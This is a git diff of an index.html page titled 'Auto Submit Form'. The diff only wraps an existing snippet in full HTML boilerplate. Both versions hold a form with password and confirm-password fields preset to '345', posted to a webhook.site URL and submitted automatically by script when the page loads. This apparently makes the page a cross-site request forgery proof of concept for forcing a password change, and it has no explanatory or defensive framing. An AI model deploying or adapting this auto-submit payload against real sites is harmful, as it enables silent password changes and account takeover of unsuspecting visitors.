--- a/index.html
+++ b/index.html
@@ -1,7 +1,17 @@
-<form action="https://webhook.site/4aa2fda7-ec6c-4b07-903f-9f09e628ea22" method="POST">
-    <input name="password" value="345">
-    <input name="confirm-password" value="345">
-</form>
-<script>
-    document.forms[0].submit()
-</script>
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Auto Submit Form</title>
+</head>
+<body>
+    <form action="https://webhook.site/4aa2fda7-ec6c-4b07-903f-9f09e628ea22" method="POST">
+        <input name="password" value="345">
+        <input name="confirm-password" value="345">
+    </form>
+    <script>
+        document.forms[0].submit();
+    </script>
+</body>
+</html>
